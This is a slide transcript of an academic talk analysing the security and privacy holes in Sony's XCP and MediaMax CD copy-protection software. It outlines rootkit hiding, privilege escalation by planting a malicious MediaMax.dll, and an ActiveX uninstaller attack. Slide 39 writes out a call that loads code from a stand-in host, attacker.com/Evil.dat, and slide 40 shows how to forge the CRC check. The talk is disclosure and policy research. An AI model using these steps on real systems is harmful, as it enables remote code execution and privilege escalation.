Presentation is loading. Please wait.

Presentation is loading. Please wait.

1 J. Alex Halderman Dangerous Tunes Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "1 J. Alex Halderman Dangerous Tunes Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy."— Presentation transcript:

1 1 J. Alex Halderman Dangerous Tunes Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of Computer Science Princeton University

2 2 J. Alex Halderman The “Episode” – Fall 2005 World’s second largest music company Major anti-piracy plan, gone badly awry Millions of copies of dangerous software Hundreds of thousands of PCs at risk International protests, class-action suits Multi-million dollar recall, settlements Case study of digital rights management

3 3 J. Alex Halderman Cast of Characters First4InternetSunnComm “Light years beyond encryption™” 52 titles 4.7 million discs 37 titles 20 million discs

4 4 J. Alex Halderman In Today’s Talk 1.How CD DRM works 2.Vulnerabilities –The XCP Rootkit –Spyware-like Behaviors –MediaMax Player Hole –Uninstaller Holes 3.Conclusions Content protection problems  User security problems Lessons for security and IT policy communities Focus: Vulnerabilities for end users, not holes in content protection

5 5 J. Alex Halderman What is CD DRM? CD Players Plays normally Computers Restricted use e.g. Can’t copy disc Can’t rip as MP3 Can’t use on iPod

6 6 J. Alex Halderman Passive Protection Drivers Ripper/copier Application OS   Modify data format to confuse hardware or OS

7 7 J. Alex Halderman Active Protection Drivers Ripper/copier Application OS Protection software Install protection driver that breaks applications 

8 8 J. Alex Halderman Active Protection First time protected CD is inserted… –Autorun (normal Windows feature) executes installer from the CD –Installs active protection driver –Remains on system Drivers Ripper/copier Application OS Protection driver

9 9 J. Alex Halderman Active Protection Drivers Ripper/copier Application OS Protection driver Normal CD Drivers Ripper/copier Application OS Protection driver  # CD marked as protected User tries to rip or copy a disc… –Active protection software interposes between CD driver and app –Checks disc — should deny access? –If yes, introduces errors into audio

10 10 J. Alex Halderman Defeating Active Protection Prevent installation –Infamous shift key ‘attack’ (disables autorun) –Turn autorun off –Use Linux, Mac OS, etc. Interfere with disc detection Disable or remove protection drivers

11 11 J. Alex Halderman XCP Rootkit: Motivation Content protection problem: Users will remove active protection software XCP response: Actively conceal processes, files, registry keys

12 12 J. Alex Halderman The XCP Rootkit

13 13 J. Alex Halderman XCP Rootkit: Discovery Mark Russinovich October 31, 2005

14 14 J. Alex Halderman XCP Rootkit: Operation KeQueryDirectoryFile0x8060bb9c KeCreateFile0x8056b9c8 KeQuerySystemInformation0x805ca104 KeEnumerateKey0x805010d0 KeOpenKey0x805c9e3c …… KeServiceDescriptorTable Application int KeQueryDirectoryFile(…) { … } KeQueryDirectoryFile(…); 0x8060bb9c: Windows Kernel Normal Windows system call (List files in a directory)

15 15 J. Alex Halderman KeQueryDirectoryFile0x0f967bfa KeCreateFile0x8056b9c8 KeQuerySystemInformation0x805ca104 KeEnumerateKey0x805010d0 KeOpenKey0x805c9e3c …… KeServiceDescriptorTable Application int KeQueryDirectoryFile(…) { … } KeQueryDirectoryFile(…); 0x8060bb9c: Windows Kernel int Rootkit_QueryDirectoryFile(…) {… if filename begins with “$sys$”: remove from results 0xf967bfa: Rootkit (Aries.sys) XCP Rootkit: Operation

16 16 J. Alex Halderman XCP Rootkit: Operation Magic prefix: $sys$ –Files –Processes –Registry keys Exception: If calling process starts with $sys$, can see everything Hidden

17 17 J. Alex Halderman XCP Rootkit: Problems Local privilege escalation –All marked files, processes, and registry keys hidden — not limited to XCP software –Malware ran by non-privileged users can’t install own rootkit, but can utilize XCP’s –Use to hide from virus checkers, admin tools Exploits in wild –Backdoor.Ryknos.B, Trojan.Welomoch

18 18 J. Alex Halderman XCP Rootkit: Reaction “Most people, I think, don't even know what a Rootkit is, so why should they care about it?” — Thomas Hesse President, Sony BMG Global Digital Business (Nov. 4) “It’s very important to remember that it’s your intellectual property — it’s not your computer. And in the pursuit of protection of intellectual property, it’s important not to defeat or undermine the security measures that people need to adopt in these days.” — Stewart Baker Asst. U.S. Secretary of Homeland Security (Nov. 14) Nov. 3:Sony releases first patch to remove rootkit Nov. 10:First class action lawsuits filed against Sony Nov. 15: Sony recalls XCP discs

19 19 J. Alex Halderman XCP Rootkit: Lessons Dangerous XCP CDs on sale for six months (~2 million discs) before rootkit revealed Not detected by any commercial anti-virus or anti-spyware software Security vendors need to better scrutinize software from major content companies (no matter how worthy their goals).

20 20 J. Alex Halderman XCP and MediaMax Players

21 21 J. Alex Halderman Spyware-like Behavior Both XCP and MediaMax: “Phone home” about each album played –Purpose: Platform monetization (sell ads) –Vendor learns album ID, IP address –Sometimes can link IP and email address –Not disclosed in EULAs or privacy policies POST /perfectplacement/retrieveassets.asp?id= 7F63A4FD-9FBD-486B-B473-D18CC92D05C0 HTTP/1.1 Host: license.sunncomm2.com

22 22 J. Alex Halderman Spyware-like Behavior Both XCP and MediaMax: Ship without a meaningful uninstaller Install without consent or exceed consent –Both: Block access to many CDs, not just one –XCP: Installs undisclosed rootkit –MediaMax: Installs 13+ MB, even if user declines

23 23 J. Alex Halderman CD DRM Players: Lessons Spyware hard to define, but certain behaviors clearly contrary to norms Goal: Informed consent, particularly regarding controversial behaviors

24 24 J. Alex Halderman MediaMax Player: Motivation Content protection problem: –Users will decline to install active protection –Platform building very lucrative for vendor Incentive mismatch between vendor and label MediaMax response: Install aggressively, regardless of consent

25 25 J. Alex Halderman MediaMax Player: Problem

26 26 J. Alex Halderman MediaMax Player: Problem Everyone — Full Control Will be reset to insecure state next time CD is inserted

27 27 J. Alex Halderman MediaMax Player: Attack 1 (Jesse Burns and Alex Stamos) 1.Non-privileged user replaces MMX.exe with attack version 2.Privileged user plays CD 3.Attack code runs with privileges

28 28 J. Alex Halderman MediaMax Player: Attack 2 1.Attacker prepares booby-trapped MediaMax.dll, malicious code in DllMain() function 2.Non-privileged user replaces installed file with attack version 3.Privileged user inserts CD 4.Even before displaying a EULA, software on CD calls MediaMax.dll code to check version 5.Attack code runs with privileges

29 29 J. Alex Halderman MediaMax Player: Attack 2 Sony patch for first attack checks MediaMax.dll version (avoid deactivating future DRM versions?) If already booby-trapped, patch will set off the attack code! Vulnerable even if never accepted EULA

30 30 J. Alex Halderman MediaMax Player: Lessons Aggressive DRM can make other security problems harder to fix Vendors may take longer to fix security problems when doing so may weaken content protection

31 31 J. Alex Halderman XCP and MediaMax Uninstallers

32 32 J. Alex Halderman Uninstallers: Motivation Content protection problem: Angry customers demand the ability to remove active protection software –E.g., to resolve security problems XCP and MediaMax response: Make uninstallers hard to get, use online design to limit who can use them

33 33 J. Alex Halderman XCP Uninstaller: Step 1

34 34 J. Alex Halderman XCP Uninstaller: Step 2 Wait for email (hours)

35 35 J. Alex Halderman XCP Uninstaller: Step 3

36 36 J. Alex Halderman XCP Uninstaller: Step 4 Wait for second email (several days)

37 37 J. Alex Halderman XCP Uninstaller: Step 5 Finally, visit web page and run uninstaller (But if you insert the CD again, go back to step 1!)

38 38 J. Alex Halderman XCP Uninstaller: Operation “HTTP GET /XCP.dat” XCP Uninstall web page: CodeSupport.Uninstall(“http://www.sony-bmg.com/XCP.dat”) Server sony-bmg.com XCP.dat Client CodeSupport.ocx Client extracts InstallLite.dll from XCP.dat, calls function UnInstall.xcp ActiveX control will accept arbitrary URL Code from that URL is not authenticated Control is not removed after use Problems: 1. 2. 3.

39 39 J. Alex Halderman XCP Uninstaller: Attack “HTTP GET /Evil.dat” Victim visits attacker’s web page: CodeSupport.Uninstall(“http://www.attacker.com/Evil.dat”) Server attacker.com Evil.dat Client CodeSupport.ocx Client extracts InstallLite.dll from Evil.dat, calls function UnInstallXCP Attack code runs with local user’s privileges. 2. 3. 4. Attacker constructs Evil.dat1. Creates InstallLite.dll and puts attack code in UninstallXCP function

40 40 J. Alex Halderman Constructing Evil.dat Archive files protected with proprietary CRC 1.Prepare Evil.dat with random CRC 2.Run with breakpoint at line 2 3.Take computed CRC and place in Evil.dat Header: Name=“UninstallXCP.dat” CRC=0x03cb1a88 ActiveX control: 1.C = ComputeCRC( ) 2.If C != Header.CRC then Terminate 3.Extract and execute file Lesson: Use a digital signature!

41 41 J. Alex Halderman MediaMax Uninstaller “Oops!... I did it again”

42 42 J. Alex Halderman MediaMax Uninstaller “GET /validate.asp?key=3984-…” MediaMax Uninstall web page: AxWebRemove.Remove(3984-9201-0039-2257, “http://www.sunncomm.com/validate.asp”) Server sunncomm.com “http://sunncomm.com/webrem.dll” Client AxWebRemove.ocx Client calls function ECF7() from WebRem.dll 1. 2. 4. “GET /webrem.dll” Server sunncomm.com WebRem.dll Client AxWebRemove.ocx 3.

43 43 J. Alex Halderman Uninstallers: Lessons Content security problems complicate design of software systems, inviting security problems Resources devoted to content security at expense of user security may allow simple vulnerabilities to slip through

44 44 J. Alex Halderman Chronology 31Oct. 3Nov. 10 14 15 17 6Dec. 7 30 Oct.31Rootkit revealed Nov.3 Sony releases XCP patch 10First suits filed against Sony 14XCP patch/uninstaller hole 15Sony recalls XCP discs 17 MediaMax uninstaller hole Dec.6MediaMax player hole 7Hole in patch for MediaMax player hole 30First suits settled

45 45 J. Alex Halderman Aftermath XCP discs recalled; MediaMax halted (but still on many store shelves) Major class-action suits settled –Customers can trade discs for cash, downloads, and non-DRM versions State, Federal governments still investigating Sony won’t use CD DRM, for now

46 46 J. Alex Halderman Conclusions DRM poses threats to user security and privacy Security community/policymakers must be wary, despite worthy goal of protecting copyright Even major content vendors should be scrutinized

47 47 J. Alex Halderman Conclusions Efficacy of DRM can be inversely related to user’s ability to defend against security threats –Users need to understand and control operation of the computer –Some DRM systems rely on undermining understanding and control (XCP rootkit)

48 48 J. Alex Halderman The Stakes are High! Bad DRM can… –Harm users –Create major liability for content owners –Reduce sales for artists –Ultimately, reduce incentive to create

49 49 J. Alex Halderman Dangerous Tunes Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of Computer Science Princeton University Paper: http://itpolicy.princeton.edu/pub/

Download ppt "1 J. Alex Halderman Dangerous Tunes Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy."

Similar presentations

Keep Your PC Safe (Windows 7, Vista or XP) Nora Lucke 02/05/2012 Documents - security.

Keep Your PC Safe (Windows 7, Vista or XP) Nora Lucke 02/05/2012 Documents - security.
Let’s Talk About Cyber Security

Let’s Talk About Cyber Security
Thank you to IT Training at Indiana University Computer Malware.

Thank you to IT Training at Indiana University Computer Malware.
Lessons from Security Failures In Nontraditional Computing Environments J. Alex Halderman.

Lessons from Security Failures In Nontraditional Computing Environments J. Alex Halderman.
Day 4-1-1 anti-virus 3-3-1.anti-virus 1 detecting a malicious file malware, detection, hiding, removing.

Day anti-virus anti-virus 1 detecting a malicious file malware, detection, hiding, removing.
1 The Sony CD DRM Debacle A case study of digital rights management.

1 The Sony CD DRM Debacle A case study of digital rights management.
US Copyright Law & Protecting Your Privacy On-Line Marty Manjak Information Security Officer.

US Copyright Law & Protecting Your Privacy On-Line Marty Manjak Information Security Officer.
1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?

1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?
Online Banking Fraud Prevention Recommendations and Best Practices This document provides you with fraud prevention best practices that every employee.

Online Banking Fraud Prevention Recommendations and Best Practices This document provides you with fraud prevention best practices that every employee.
3 Section C: Installing Software and Upgrades  Web Apps  Mobile Apps  Local Applications  Portable Software  Software Upgrades and Updates  Uninstalling.

3 Section C: Installing Software and Upgrades  Web Apps  Mobile Apps  Local Applications  Portable Software  Software Upgrades and Updates  Uninstalling.
CD DRM & SONY-BMG: a case study Muhammed Afzal Hussain Digital Rights Management Seminar 17 th May, 2006.

CD DRM & SONY-BMG: a case study Muhammed Afzal Hussain Digital Rights Management Seminar 17 th May, 2006.
1 J. Alex Halderman Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of.

1 J. Alex Halderman Lessons from the Sony CD-DRM Episode J. Alex Halderman and Edward W. Felten Center for Information Technology Policy Department of.
To Protect or Not Protect - - - Sony/BMG’s DRM Dilemma Sony’s Attempt-- Sony/BMG’s digital right’s management (DRM) “rootkit” inclusion on their music.

To Protect or Not Protect Sony/BMG’s DRM Dilemma Sony’s Attempt-- Sony/BMG’s digital right’s management (DRM) “rootkit” inclusion on their music.
Web Security A how to guide on Keeping your Website Safe. By: Robert Black.

Web Security A how to guide on Keeping your Website Safe. By: Robert Black.
The Downside to DRM. What is DRM? “Digital Rights Management” Software used to control access to copyrighted material Protect company from piracy.

The Downside to DRM. What is DRM? “Digital Rights Management” Software used to control access to copyrighted material Protect company from piracy.
Vijay krishnan Avinesh Dupat  Collection of tools (programs) that enable administrator-level access to a computer or computer network.  The main purpose.

Vijay krishnan Avinesh Dupat  Collection of tools (programs) that enable administrator-level access to a computer or computer network.  The main purpose.
Rootkits: Sneaky, Stealthy Toolboxes

Rootkits: Sneaky, Stealthy Toolboxes
Computer Security and Penetration Testing

Computer Security and Penetration Testing
February 28, 2005 1 The Sony BMG DRM Debacle Corynne McSherry, Staff Attorney.

February 28, The Sony BMG DRM Debacle Corynne McSherry, Staff Attorney.
Chapter Nine Maintaining a Computer Part III: Malware.

Chapter Nine Maintaining a Computer Part III: Malware.

Similar presentations

Ads by Google